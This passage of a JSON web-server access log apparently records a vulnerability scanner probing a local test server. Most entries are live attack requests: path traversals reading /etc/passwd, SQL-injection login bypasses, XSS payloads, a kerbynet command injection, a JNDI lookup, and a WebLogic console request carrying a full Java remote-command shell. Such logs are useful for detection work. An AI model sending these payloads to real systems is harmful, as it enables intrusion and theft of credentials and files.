/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A 00000001-00000001\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <_this xsi:type=\x22ManagedObjectReference\x22 type=\x22ServiceInstance\x22>ServiceInstance\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sdk/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configurations HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminlogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.041","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /opensis/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /feed/rdf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.232","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.244","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmltopdf/downfile.php?filename=/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /express-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 